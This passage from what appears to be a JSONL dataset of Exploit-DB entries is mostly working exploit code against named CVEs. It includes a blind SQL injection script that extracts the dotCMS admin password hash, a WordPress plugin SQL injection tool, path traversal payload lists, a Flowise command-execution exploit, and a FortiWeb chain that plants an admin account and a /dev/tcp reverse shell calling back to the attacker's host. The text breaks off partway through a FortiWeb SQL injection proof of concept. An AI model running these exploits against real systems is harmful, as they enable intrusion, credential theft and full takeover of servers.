requests\n\n### User configuration\nHOST=\"127.0.0.1:8443\";\nTARGET_ACCOUNT = \"admin@dotcms.com\";\nSLEEP_TIME=10;\nTOKEN=\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhcGk0ZjFhNGYyMi1lYzI5LTQ4OTUtYTBlYi1jYjRkYjEzOGQ2MDAiLCJ4bW9kIjoxNzUxOTQzOTEwMDAwLCJuYmYiOjE3NTE5NDM5MTAsImlzcyI6ImRvdGNtc19kZXYiLCJsYWJlbCI6InRva2VuIiwiZXhwIjoxODQ2NjQxNjAxLCJpYXQiOjE3NTE5NDM5MTAsImp0aSI6IjMyNjIxYmRkLTNhYjEtNGRiMi1iNjEyLWMzMDg5M2EyODBiZSJ9.jqXkfM4Itxy_q2kA10srcL_3NBBx6keXx2PM0mESPFI\";\nCHARS = string.printable;\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning);\n\ndef encode_all_characters(string):\n    return \"\".join(\"%{0:0>2x}\".format(ord(char)) for char in string);\n\ndef send_request(payload=\"\"):\n    payload = encode_all_characters(payload);\n    burp0_url = f\"https://{HOST}/api/v1/contenttype?filter=LCKwsF&page=774232&per_page=517532&orderby=wDdAmr&direction=DESC&type=DOTASSET&host=BBadoI&sites=PoC{payload}\";\n    burp0_headers = {\"Accept-Encoding\": \"gzip, deflate, br\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US;q=0.9,en;q=0.8\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\", \"Connection\": \"close\", \"Cache-Control\": \"max-age=0\", \"Authorization\": f\"Bearer {TOKEN}\"};\n    return requests.get(burp0_url, headers=burp0_headers, verify=False);\n\ndef send_sqli(q):\n    query = \"') AND 1=(\" + q + \") AND ('A' LIKE 'A\";\n    return send_request(query);\n\ndef test_sqli():\n    print(\"[!] Checking target responsiveness...\")\n    r = send_request();\n\n    if '{\"entity\":[],\"errors\":[],\"i18nMessagesMap\":{},\"messages\":[],\"pagination\":{\"currentPage\":' not in r.text:\n        print(\"[-] Target did NOT return the expected JSON structure. Exiting.\");\n        sys.exit(1);\n   \n    print(\"[+] Target responded correctly.\\n\");\n\n    r = send_sqli(f\"SELECT 1 FROM PG_SLEEP({SLEEP_TIME})\");\n\n    if (not r.elapsed.total_seconds() >= SLEEP_TIME):\n        print(\"[-] Target did not pause as expected; Exiting.\");\n        sys.exit(1);\n\n\ndef retrieve_password(TEMPLATE, CHARS):\n    CHARS = \":\" + CHARS.replace(\":\", '');\n    output = \"\";\n    index = 1;\n\n    while True:\n        for character in CHARS:\n            query = str(TEMPLATE).replace(\"[_INDEX_PLACEHOLDER_]\", str(index)).replace(\"[_ASCII_PLACEHOLDER_]\", str(ord(character)));\n       \n            r = send_sqli(query);\n       \n            if (r.elapsed.total_seconds() >= SLEEP_TIME):\n                print(f\"[+] Found character: {character}\");\n                index += 1;\n                output += character;\n                break;\n        else:\n            break;\n\n    return output;\n\ntest_sqli();\n\nprint(\"[+] Target is Vulnerable to SQL Injection.\\n\");\n\nTEMPLATE = f\"SELECT (CASE WHEN (substring(password_ from [_INDEX_PLACEHOLDER_] for 1)=chr([_ASCII_PLACEHOLDER_])) THEN (SELECT 1 FROM pg_sleep({SLEEP_TIME / 2}) WHERE emailaddress = '{TARGET_ACCOUNT}') ELSE 1 END) from user_ where emailaddress = '{TARGET_ACCOUNT}'\";\n\npassword = retrieve_password(TEMPLATE, CHARS);\n\nprint(f\"[+] Retrieved hash/password for {TARGET_ACCOUNT}: {password}\");", "cve_id": "CVE-2025-8311", "source": "exploitdb", "timestamp": "2025-09-16T00:00:00+00:00"} {"id": "33e4b06ca3e58e887ed9", "text": "ELEX WooCommerce WordPress Plugin 1.4.3 - SQL Injection\n\n/*\n * Exploit Title : ELEX WooCommerce WordPress Plugin 1.4.3 - SQL Injection\n * Author : Byte Reaper\n * Cve id : CVE-2025-10046\n * Service : plugin wordpress\n * Plugin : ELEX WooCommerce Google Shopping\n * Version : 1.4.3\n * Type : SQL injection\n * Parameter injection : file_to_delete\n * Location file : includes/elex-manage-feed-ajax.php\n * Exploit Privilege Access : High (admin account)\n * Run:\n * # gcc exploit.c argparse.c -o CVE-2025-10046 -lcurl\n * # ./CVE-2025-10046 -h (Help)\n * # ./CVE-2025-10046 -u (url)\n * # ./CVE-2025-10046 -c (cookie)\n * # ./CVE-2025-10046 -v (verbose)\n * Run Script :\n * # ./CVE-2025-10046 -u http://127.0.0.1 -v -c [Cookie file admin]\n */\n\n#include \n#include \n#include \"argparse.h\"\n#include \n#include \n#include \n#include \n#define FULL 4000\n#define D_P 3000\nint verbose=0;\nint selCookie=0;\nconst char *baseurl = NULL;\nconst char *cookies = NULL;\nstatic void asmExit()\n{\n printf(\"\\e[0;35m[+] Exit syscall : ================================================\\n\");\n const char *mes6 = \"\\e[0;34m[+] Success Get pid.\\e[0m\\n\";\n const char *mes7 = \"\\e[0;31m[-] Error : Error Get pid,Exit...\\e[0m\\n\";\n const char *mes8 = \"\\e[0;34m[+] Success Get tid.\\e[0m\\n\";\n const char *mes9 = \"\\e[0;31m[-] Error : Error Get tid,Exit...\\e[0m\\n\";\n size_t len6 = strlen(mes6);\n size_t len7 = strlen(mes7);\n size_t len8 = strlen(mes8);\n size_t len9 = strlen(mes9);\n pid_t pid;\n pid_t tid;\n long a;\n long b;\n __asm__ volatile\n (\n \"syscall\\n\\t\"\n :\"=a\"(a)\n :\"a\"(0x27)\n :\"rcx\",\n \"r11\",\n \"memory\"\n );\n __asm__ volatile\n (\n \"cmp $0x0, %[var3]\\n\\t\"\n \"je .resulPid\\n\\t\"\n \".doPid:\\n\\t\"\n \"mov $0x1, %%rdi\\n\\t\"\n \"mov $0x1, %%rax\\n\\t\"\n \"mov %[len6], %%rdx\\n\\t\"\n \"mov %[len6], %%rsi\\n\\t\"\n \"syscall\\n\\t\"\n \"jmp .fiPid\\n\\t\"\n \".resulPid:\\n\\t\"\n \"mov %[len7], %%rdx\\n\\t\"\n \"mov $0x1, %%rax\\n\\t\"\n \"mov $0x1, %%rdi\\n\\t\"\n \"mov %[mes7], %%rsi\\n\\t\"\n \"syscall\\n\\t\"\n \"mov $0x0, %%rdi\\n\\t\"\n \"mov $0x3C, %%rax\\n\\t\"\n \"syscall\\n\\t\"\n \".fiPid:\\n\\t\"\n :\n : [var3] \"r\" (a),\n [mes6] \"r\" (mes6),\n [len6] \"r\" (len6),\n [mes7] \"r\" (mes7),\n [len7] \"r\" (len7)\n : \"rax\",\n \"rdi\",\n \"rsi\",\n \"rdx\"\n );\n pid = (pid_t)a;\n __asm__ volatile\n (\n \"syscall\\n\\t\"\n :\"=a\"(b)\n :\"a\"(0xBA)\n :\"rcx\",\n \"r11\",\n \"memory\"\n );\n __asm__ volatile\n (\n \"cmp $0x0, %[varTId]\\n\\t\"\n \"je .bfGF\\n\\t\"\n \".dkp:\\n\\t\"\n \"mov $0x1, %%rdi\\n\\t\"\n \"mov $0x1, %%rax\\n\\t\"\n \"mov %[mes8], %%rsi\\n\\t\"\n \"mov %[len8], %%rdx\\n\\t\"\n \"syscall\\n\\t\"\n \"jmp .plrg\\n\\t\"\n \".bfGF:\\n\\t\"\n \"mov $0x1, %%rdi\\n\\t\"\n \"mov %[mes9], %%rsi\\n\\t\"\n \"mov %[len9], %%rdx\\n\\t\"\n \"mov $0x1, %%rax\\n\\t\"\n \"syscall\\n\\t\"\n \"mov $0x3C, %%rax\\n\\t\"\n \"xor %%rdi, %%rdi\\n\\t\"\n \"syscall\\n\\t\"\n \".plrg:\\n\\t\"\n :\n : [varTId] \"r\" (tid),\n [mes8] \"r\" (mes8),\n [len8] \"r\" (len8),\n [mes9] \"r\" (mes9),\n [len9] \"r\" (len9)\n : \"rax\",\n \"rdi\",\n \"rsi\",\n \"rdx\"\n );\n tid = (pid_t)b;\n printf(\"[+] PID : %d\\n\", (int)a);\n printf(\"[+] TID : %d\\n\", (int)b);\n __asm__ volatile\n (\n \"mov $0x3E, %%rax\\n\\t\"\n \"mov %[pidValue], %%rdi\\n\\t\"\n \"mov $0x0, %%rsi\\n\\t\"\n \"syscall\\n\\t\"\n :\n : [pidValue] \"r\" (a)\n : \"rax\",\n \"rdi\",\n \"rsi\"\n\n );\n printf(\"\\e[0;35m===================================================================\\n\");\n}\n\nstruct Mem\n{\n char *buffer;\n size_t len;\n};\nsize_t write_cb(void *ptr,\n size_t size,\n size_t nmemb,\n void *userdata)\n{\n size_t total = size * nmemb;\n struct Mem *m = (struct Mem *)userdata;\n char *tmp = realloc(m->buffer, m->len + total + 1);\n if (tmp == NULL)\n {\n fprintf(stderr, \"\\e[0;31m[-] Failed to allocate memory!\\e[0m\\n\");\n asmExit();\n }\n m->buffer = tmp;\n memcpy(&(m->buffer[m->len]), ptr, total);\n m->len += total;\n m->buffer[m->len] = '\\0';\n return total;\n}\n\nconst char *pyL[] =\n {\n \"UNION ALL SELECT NULL\",\n \"AND 532=CONVERT(INT,(UNION ALL SELECTCHAR(55)+CHAR(55)))\",\n \"UNION ALL SELECT 'INJ'||'ECT'||'XXX',4,5,6\",\n \"or 1=1/*\",\n \"or '1'='1'\",\n \" HAVING 1=1\",\n NULL\n };\nconst char *word[] =\n ", "cve_id": "CVE-2025-10046", "source": "exploitdb", "timestamp": "2025-09-16T00:00:00+00:00"} {"id": "c0b7894c032c930d19d1", "text": "esm-dev 136 - Path Traversal\n\n# Exploit Title: esm-dev 136 - Path Traversal\n# Date: 2025-07-11\n# Exploit Author: Byte Reaper\n#Vendor Homepage: https://github.com/esm-dev/esm.sh\n# Software Link: https://github.com/esm-dev/esm.sh\n# CVE-2025-59342\n - File : exploit.c\n - Date : 09/17/2025\n - Target : esm-dev\n - Version: 136\n - Target Endpoint : /transform\n - Target Header : X-Zone-Id\n - Vuln :\n - Run exploit :\n # gcc exploit.c argparse.c -o CVE-2025-59342 -lcurl\n # ./CVE-2025-59342\n\n#include \n#include \n#include \n#include \"argparse.h\"\n#include \n#include \n#include \n#define FULL_URL 2500\n#define P_Y 2000\n#define POST_DATA 9000\nint flagPort = 0;\nint port = 80;\nint selectPort = -1;\nint verbose = 0;\nint code = 1;\nint found = 1;\nint cF = 0;\nint s = 0;\nint bY = 0;\nint sP = 0;\nconst char* cookies = NULL;\nconst char* payload = NULL;\nvoid exit64bit()\n{\n int n = 0;\n __asm__ volatile\n (\n \"mov $0x4A, %%rax\\n\\t\"\n \"mov $0x1, %%rdi\\n\\t\"\n \"syscall\\n\\t\"\n \"test %%rax, %%rax\\n\\t\"\n \"jz .aD\\n\\t\"\n \"mov $0x0, %[var]\\n\\t\"\n \"jmp .finish\\n\\t\"\n \".aD:\\n\\t\"\n \"mov $0x1, %[var]\\n\\t\"\n \".finish:\\n\\t\"\n : [var] \"+r\" (n)\n :\n : \"rax\",\n \"rdi\"\n );\n if (n == 0)\n {\n printf(\"\\e[0;31m[-] sys_fsync syscall Faild.\\n\");\n fflush(stdout);\n }\n else if (n == 1)\n {\n printf(\"[+] sys_fsync syscall Success.\\n\");\n }\n\n __asm__ volatile\n (\n \"mov $0x0, %%rdi\\n\\t\"\n \"mov $0x3C, %%rax\\n\\t\"\n \"syscall\\n\\t\"\n :\n :\n : \"rax\",\n \"rdi\"\n );\n}\n\nstruct Mem\n{\n char* buffer;\n size_t len;\n};\nsize_t write_cb(void* ptr, size_t size, size_t nmemb, void* userdata)\n{\n size_t total = size * nmemb;\n struct Mem* m = (struct Mem*)userdata;\n char* tmp = realloc(m->buffer, m->len + total + 1);\n if (!tmp) return 0;\n m->buffer = tmp;\n memcpy(&(m->buffer[m->len]), ptr, total);\n m->len += total;\n m->buffer[m->len] = '\\0';\n return total;\n}\n\nint checkLen(int len, char* buf, size_t bufcap)\n{\n if (len < 0 || (size_t)len >= bufcap)\n {\n printf(\"\\e[0;31m[-] Len is Long ! \\e[0m\\n\");\n printf(\"\\e[0;31m[-] Len %d\\e[0m\\n\", len);\n return 1;\n }\n else\n {\n printf(\"\\e[0;34m[+] Len Is Not Long.\\e[0m\\n\");\n return 0;\n\n }\n return 0;\n}\n\nconst char* payloads[] =\n{\n \"..//..//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa//\",\n \"..../..../m.o.d.u.les/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/\",\n \"..\\\\/..\\\\/modules\\\\/transform\\\\/c245626ef6ca0fd9ee37759c5fac606c6ec99daa\\\\/\",\n \".//.//m?odu?le?s/tran.sfo.rm/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/\",\n \"..%252f%252f..%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f\",\n \"%252e%252e%252f%252f%252e%252e%252f%252fmodules%252f%252ftransform%252f%252fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%252f\",\n \"..%2f%2f..modules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f\",\n \"%2e%2e%2f%2f%2e%2emodules%2f%2ftransform%2f%2fc245626ef6ca0fd9ee37759c5fac606c6ec99daa%2f\",\n \"..%255c%255c..%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c\",\n \"%252e%252e%255c%255c%252e%252e%255c%255cmodules%255c%255ctransform%255c%255cc245626ef6ca0fd9ee37759c5fac606c6ec99daa%255c%255c\",\n \"%u002e%u002e%u2215%u2215%u002e%u002e%u2215%u2215modules%u002e%u002etransform%u002e%u002ec245626ef6ca0fd9ee37759c5fac606c6ec99daa%u002e\",\n \"%u002e%u002e%u2216%u2216%u002e%u002e%u2216%u2216modules%u2216%u2216transform%u2216%u2216c245626ef6ca0fd9ee37759c5fac606c6ec99daa%u2216\",\n \"%e0%40%ae%e0%40%ae%e0%80%af%e0%80%af%e0%40%ae%e0%40%ae%e0%80%af%e0%80%afmodules%e0%80%af%e0%80%aftransform%e0%80%af%e0%80%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%e0%80%af\",\n \".%00.//.%00.//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/\",\n \"..;//..;//modules//transform//c245626ef6ca0fd9ee37759c5fac606c6ec99daa/\",\n \"%c0%2e%c0%2e%c0%af%c0%af%c0%2e%c0%2e%c0%af%c0%afmodules%c0%af%c0%aftransform%c0%af%c0%afc245626ef6ca0fd9ee37759c5fac606c6ec99daa%c0%af\",\n NULL\n\n};\n\nstatic void request(const char *baseurl)\n{\n CURL* curl = curl_easy_init();\n const char *mes3 = \"\\e[0;34m[+] Create Object CURL Success.\\n\";\n const char *mes4 = \"\\e[0;31m[-] Error Create Object CURL !\\e[0m\\n\";\n size_t len3 = strlen(mes3);\n size_t len4 = strlen(mes4);\n __asm__ volatile\n (\n \"cmp $0x0, %[curlO]\\n\\t\"\n \"je .donV\\n\\t\"\n \".erD:\\n\\t\"\n \"mov $0x1, %%rax\\n\\t\"\n \"mov $0x1, %%rdi\\n\\t\"\n \"mov %[msg], %%rsi\\n\\t\"\n \"mov %[len], %%rdx\\n\\t\"\n \"syscall\\n\\t\"\n \"jmp .finishC\\n\\t\"\n \".donV:\\n\\t\"", "cve_id": "CVE-2025-59342", "source": "exploitdb", "timestamp": "2025-12-16T00:00:00+00:00"} {"id": "408191a7f8badcc17573", "text": "Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)\n\n# Exploit Title: Exclusive Addons for Elementor ≤ 2.6.9 - Authenticated Stored Cross-Site Scripting (XSS)\n# Original Author: Wordfence Security Team\n# Exploit Author: Al Baradi Joy\n# Exploit Date: March 13, 2024\n# Vendor Homepage: https://exclusiveaddons.com/\n# Software Link: https://wordpress.org/plugins/exclusive-addons-for-elementor/\n# Version: Up to and including 2.6.9\n# Tested Versions: 2.6.9\n# CVE ID: CVE-2024-1234\n# Vulnerability Type: Stored Cross-Site Scripting (XSS)\n# Description:\nThe Exclusive Addons for Exclusive Addons for Elementor for WordPress, in versions up to\nand including 2.6.9, is vulnerable to stored cross-site scripting (XSS) via\nthe 's' parameter. Due to improper input sanitization and output escaping,\nan attacker with contributor-level permissions or higher can inject\narbitrary JavaScript that executes when a user views the affected page.\n# Proof of Concept: Yes\n# Categories: Web Application, Cross-Site Scripting (XSS), WordPress Plugin\n# CVSS Score: 6.5 (Medium)\n# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n# Notes:\nTo exploit this vulnerability, an attacker needs an authenticated user role\nwith permission to edit posts. Injecting malicious JavaScript can lead to\nsession hijacking, redirections, and other client-side attacks.\n\n## Exploit Code:\n\n```python\nimport requests\nfrom urllib.parse import urlparse\n\n# Banner\ndef display_banner():\n exploit_title = \"CVE-2024-1234: Exclusive Addons for Elementor Plugin\nStored XSS\"\n print(\"=\"*50)\n print(f\"Exploit Title: {exploit_title}\")\n print(\"Made By Al Baradi Joy\")\n print(\"=\"*50)\n\n# Function to validate URL\ndef validate_url(url):\n # Check if the URL is valid and well-formed\n parsed_url = urlparse(url)\n if not parsed_url.scheme in [\"http\", \"https\"]:\n print(\"Error: Invalid URL. Please ensure the URL starts with http://\nor https://\")\n return False\n return True\n\n# Function to exploit XSS vulnerability\ndef exploit_xss(target_url):\n # The XSS payload to inject\n payload = \"\"\n\n # The parameters to be passed (in this case, we are exploiting the 's'\nparameter)\n params = {\n 's': payload\n }\n\n # Send a GET request to the vulnerable URL with the payload\n try:\n print(f\"Sending exploit to: {target_url}\")\n response = requests.get(target_url, params=params, timeout=10)\n\n # Check if the status code is OK and if the payload is reflected in\nthe response\n if response.status_code == 200 and payload in response.text:\n print(f\"XSS exploit successful! Payload: {payload}\")\n elif response.status_code != 200:\n print(f\"Error: Received non-OK status code\n{response.status_code}\")\n else:\n print(\"Exploit failed or no XSS reflected.\")\n except requests.exceptions.RequestException as e:\n print(f\"Error: Request failed - {e}\")\n except Exception as e:\n print(f\"Unexpected error: {e}\")\n\nif __name__ == \"__main__\":\n # Display banner\n display_banner()\n\n # Ask the user for the target URL\n target_url = input(\"Enter the target URL: \").strip()\n\n # Validate the provided URL\n if validate_url(target_url):\n # Call the exploit function if URL is valid\n exploit_xss(target_url)", "cve_id": "CVE-2024-1234", "source": "exploitdb", "timestamp": "2025-04-05T00:00:00+00:00"} {"id": "9bf00dd02706e941ae69", "text": "Flowise 3.0.4 - Remote Code Execution (RCE)\n\n# Exploit Title: Flowise 3.0.4 - Remote Code Execution (RCE)\n# Date: 10/11/2025\n# Exploit Author: [nltt0] (https://github.com/nltt-br))\n# Vendor Homepage: https://flowiseai.com/\n# Software Link: https://github.com/FlowiseAI/Flowise\n# Version: < 3.0.5\n# CVE: CVE-2025-59528\n\nfrom requests import post, session\nfrom argparse import ArgumentParser\n\nbanner = r\"\"\"\n_____ _ _____\n/ __ \\ | | / ___|\n| / \\/ __ _| | __ _ _ __ __ _ ___ ___ \\ `--.\n| | / _` | |/ _` | '_ \\ / _` |/ _ \\/ __| `--. \\\n| \\__/\\ (_| | | (_| | | | | (_| | (_) \\__ \\/\\__/ /\n\\____/\\__,_|_|\\__,_|_| |_|\\__, |\\___/|___/\\____/\n __/ |\n |___/\n\n by nltt0\n\"\"\"\n\ntry:\n parser = ArgumentParser(description='CVE-2025-59528 [Flowise < 3.0.5]', usage=\"python CVE-2025-58434.py --email xtz@local --password Test@2025 --url http://localhost:3000 --cmd \\\"http://localhost:1337/`whoami`\\\"\")\n parser.add_argument('-e', '--email', required=True, help='Registered email')\n parser.add_argument('-p', '--password', required=True)\n parser.add_argument('-u', '--url', required=True)\n parser.add_argument('-c', '--cmd', required=True)\n\n args = parser.parse_args()\n email = args.email\n password = args.password\n url = args.url\n cmd = args.cmd\n\n def login(email, url):\n session = session()\n url_format = \"{}/api/v1/auth/login\".format(url)\n headers = {\"x-request-from\": \"internal\", \"Accept-Language\": \"pt-BR,pt;q=0.9\", \"Accept\": \"application/json, text/plain, */*\", \"Content-Type\": \"application/json\", \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\", \"Origin\": \"http://workflow.flow.hc\", \"Referer\": \"http://workflow.flow.hc/signin\", \"Accept-Encoding\": \"gzip, deflate, br\", \"Connection\": \"keep-alive\"}\n data={\"email\": email, \"password\": password}\n r = session.post(url_format, headers=headers, json=data)\n return session, r\n\n def rce(email, url, password, cmd):\n session, status_code = login(email, url)\n url_format = \"{}/api/v1/node-load-method/customMCP\".format(url)\n command = f'({{x:(function(){{const cp = process.mainModule.require(\"child_process\");cp.execSync(\"{cmd}\");return 1;}})()}})'\n\n data = {\n \"loadMethod\": \"listActions\",\n \"inputs\": {\n \"mcpServerConfig\": command\n }\n }\n\n r = session.post(url_format, json=data)\n\n if r.status_code == 401:\n session.headers[\"x-request-from\"] = \"internal\"\n session.post(url_format, json=data)\n\n print(f\"[x] Command executed [{cmd}]\")\n\n rce(email, url, password, cmd)\n\nexcept Exception as e:\n print('Error in {}'.format(e))", "cve_id": "CVE-2025-59528", "source": "exploitdb", "timestamp": "2025-10-31T00:00:00+00:00"} {"id": "d55063411e111bb1e9f9", "text": "Fortinet FortiWeb v8.0.1 - Auth Bypass\n\n# Titles:Fortinet FortiWeb v8.0.1 - Auth Bypass\n# Author: nu11secur1ty\n# Date: 11/15/2025\n# Vendor: https://www.fortinet.com/\n# Software: v8.0.1\n# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-64446\n\n## Description:\nCVE-2025-64446 is a critical path traversal vulnerability affecting\nmultiple versions of Fortinet FortiWeb, a Web Application Firewall (WAF)\nused to protect web applications and APIs.\nThe vulnerability allows an unauthenticated remote attacker to send\nspecially crafted HTTP/HTTPS requests that may result in administrative\naccess bypass on vulnerable FortiWeb systems.\n\n## Severity\n- CVSS v3.1 Score: 9.8 (Critical)\n- Attack Vector: Network\n- Privileges Required: None (Unauthenticated)\n- User Interaction: None\n- Impact: High (Authentication bypass, configuration exposure, potential\nfull administrative access)\n\n## Affected Products & Versions\nThe following FortiWeb versions are confirmed vulnerable:\n\n| Product | Affected Versions |\n|--------|--------------------|\n| FortiWeb 8.0.x | 8.0.0 – 8.0.1 |\n| FortiWeb 7.6.x | 7.6.0 – 7.6.4 |\n| FortiWeb 7.4.x | 7.4.0 – 7.4.9 |\n| FortiWeb 7.2.x | 7.2.0 – 7.2.11 |\n| FortiWeb 7.0.x | 7.0.0 – 7.0.11 |\n\n## Fixed Versions\nFortinet has released patched versions that fully address CVE-2025-64446:\n\n| Product | Fixed Version |\n|---------|----------------|\n| FortiWeb 8.0.x | 8.0.2 or later |\n| FortiWeb 7.6.x | 7.6.5 or later |\n| FortiWeb 7.4.x | 7.4.10 or later |\n| FortiWeb 7.2.x | 7.2.12 or later |\n| FortiWeb 7.0.x | 7.0.12 or later |\n\n## Technical Description\nThe vulnerability stems from insufficient path normalization in HTTP/HTTPS\nrequest handling, allowing externally controlled paths to bypass directory\nrestrictions.\nThis may result in:\n- Unauthorized access to backend administrative endpoints\n- Exposure of sensitive configuration\n- Potential manipulation of management interfaces\n\n## Impact\nIf successfully exploited, attackers may achieve:\n- Authentication bypass\n- Administrative access\n- Ability to view/modify configuration\n- Possible service disruption\n\n## Mitigation\nIf immediate patching is not possible:\n1. Disable public HTTP/HTTPS administrative access.\n2. Restrict admin interfaces to trusted internal networks.\n3. Use firewall rules to limit admin-port access.\n4. Monitor logs for traversal-like patterns.\n\n## Remediation\n**Upgrade to the nearest patched version as soon as possible.**\n\n## Disclosure Timeline\n| Date | Event |\n|------|--------|\n| 2025-XX-XX | Vulnerability discovered |\n| 2025-XX-XX | Vendor notified |\n| 2025-XX-XX | Patch development |\n| 2025-XX-XX | Advisory published |\n| 2025-XX-XX | CVE assigned |\n\n\n# STATUS:\nHIGH - CRITICAL\n\n\n[+]Payload:\n```\nNo! For security reasons!\n```\n\n# Reproduce:\n[href](https://www.patreon.com/posts/cve-2025-64446-143637933)\n\n# Demo:\n[href](https://www.patreon.com/posts/cve-2025-64446-143637933)\n\n# Time spent:\n25:00:00\n\n\n--\nSystem Administrator - Infrastructure Engineer\nPenetration Testing Engineer\nExploit developer at https://packetstormsecurity.com/\nhttps://cve.mitre.org/index.html\nhttps://cxsecurity.com/ and https://www.exploit-db.com/\nhome page: https://www.asc3t1c-nu11secur1ty.com/\nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=\nnu11secur1ty \n\n--\n\nSystem Administrator - Infrastructure Engineer\nPenetration Testing Engineer\nExploit developer at https://packetstorm.news/\nhttps://cve.mitre.org/index.html\nhttps://cxsecurity.com/ and https://www.exploit-db.com/\n0day Exploit DataBase https://0day.today/\nhome page: https://www.asc3t1c-nu11secur1ty.com/\nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=\n nu11secur1ty ", "cve_id": "CVE-2025-64446", "source": "exploitdb", "timestamp": "2026-04-06T00:00:00+00:00"} {"id": "7d1be73dfb61fbfbeced", "text": "FortiWeb 8.0.2 - Remote Code Execution\n\n# Exploit Title: FortiWeb 8.0.2 - Remote Code Execution\n# Date: 2025-11-22\n# Author: Mohammed Idrees Banyamer\n# Author Country: Jordan\n# Instagram: @banyamer_security\n# GitHub: https://github.com/mbanyamer\n# Vendor Homepage: https://www.fortinet.com\n# Software Link: https://www.fortinet.com/products/web-application-firewall/fortiweb\n# Version: FortiWeb < 7.6.7, < 7.8.7, < 8.0.2\n# Tested on: FortiWeb 7.4.2, 7.6.0, 7.6.1 (VM builds)\n# CVE: CVE-2025-64446\n# CVSS: 9.8 (Critical)\n# Category: WebApps\n# Platform: Hardware/Appliance (Linux-based)\n# CRITICAL: True\n# Including: Authentication Bypass + Path Traversal + Arbitrary File Upload → RCE\n# Impact: Full system compromise, root reverse shell\n# Fix: Upgrade to FortiWeb 7.6.7, 7.8.7, 8.0.2 or later\n# Advisory: https://www.fortinet.com/support/psirt/FG-IR-25-64446\n# Patch: https://support.fortinet.com\n# Target: FortiWeb management interface (default port 8443)\n\nimport requests, sys, time, base64\nfrom urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef banner():\n print(\"\"\"\n CVE-2025-64446 FortiWeb RCE Exploit\n Author: Mohammed Idrees Banyamer | @banyamer_security\n LAB / AUTHORIZED TESTING ONLY\n \"\"\")\n\nif len(sys.argv) != 4:\n banner()\n print(\"Usage : python3 fortiweb_rce.py \")\n print(\"Example: python3 fortiweb_rce.py https://192.168.100.50:8443 192.168.45.10 4444\")\n print(\"\\nSteps:\")\n print(\" 1. Start listener → nc -lvnp 4444\")\n print(\" 2. Run exploit → python3 fortiweb_rce.py 4444\")\n print(\" 3. Get root shell → enjoy\\n\")\n sys.exit(1)\n\nbanner()\ntarget = sys.argv[1].rstrip(\"/\")\nLHOST = sys.argv[2]\nLPORT = sys.argv[3]\n\nprint(f\"[*] Target : {target}\")\nprint(f\"[*] Callback : {LHOST}:{LPORT}\\n\")\n\ns = requests.Session()\ns.verify = False\ns.headers = {\"Content-Type\": \"application/json\"}\n\nprint(\"[1] Creating temporary admin user...\")\npayload = {\"../../mkey\": \"pwnedadmin\", \"password\": \"Pwned123!\", \"isadmin\": \"1\", \"status\": \"enable\"}\nr = s.post(f\"{target}/api/v2.0/user/local.add\", json=payload, timeout=10)\nif r.status_code != 200 or \"success\" not in r.text:\n print(\"[-] Failed to create admin → Target is likely patched\")\n return\n\nprint(\"[2] Logging in with new admin...\")\nlogin = s.post(f\"{target}/api/v2.0/login\", json={\"username\":\"pwnedadmin\",\"password\":\"Pwned123!\"}, timeout=10)\nif \"success\" not in login.text:\n print(\"[-] Login failed\")\n return\n\nshell = f'& /dev/tcp/{LHOST}/{LPORT} 0>&1\\'\"); ?>'\nb64shell = base64.b64encode(shell.encode()).decode() + \"AAA==\"\n\nprint(\"[3] Uploading webshell via backup function...\")\nfiles = {'upload-file': ('pwned.dat', b64shell, 'application/octet-stream')}\ns.post(f\"{target}/api/v2.0/system/maintenance/backup\", files=files, timeout=15)\n\nprint(f\"[4] Triggering reverse shell to {LHOST}:{LPORT} ...\")\ns.get(f\"{target}/pwned.dat\", timeout=10)\n\ntime.sleep(8)\nprint(\"[5] Cleaning up temporary admin account...\")\ns.post(f\"{target}/api/v2.0/user/local.delete\", json={\"../../mkey\":\"pwnedadmin\"})\n\nprint(\"\\n[+] Exploit completed – check your listener for root shell!\")", "cve_id": "CVE-2025-64446", "source": "exploitdb", "timestamp": "2026-04-08T00:00:00+00:00"} {"id": "a2003682bd96d5a3d456", "text": "FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution\n\n# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL\nInjection to Remote Code Execution\n# Date: 2025-10-05\n# Exploit Author: Milad Karimi (Ex3ptionaL)\n# Contact: miladgrayhat@gmail.com\n# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL\n# Tested on: Win, Ubuntu\n# CVE : CVE-2025-25257\n\nOverview\n\nCVE-2025-25257 is a pre-authentication SQL Injection vulnerability in\nFortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.\nThis flaw allows attackers to inject malicious SQL commands into the\nvulnerable API endpoint, potentially leading to Remote Code Execution (RCE).\n\n\nPoC\n\ncurl -k -H \"Authorization: Bearer aaa' OR '1'='1\" \\\n https:///api/fabric/device/status\n\nPoC Python\n\nimport requests\n\ndef test_sqli(base_url):\n url = f\"{base_url}/api/fabric/device/status\"\n headers = {\n 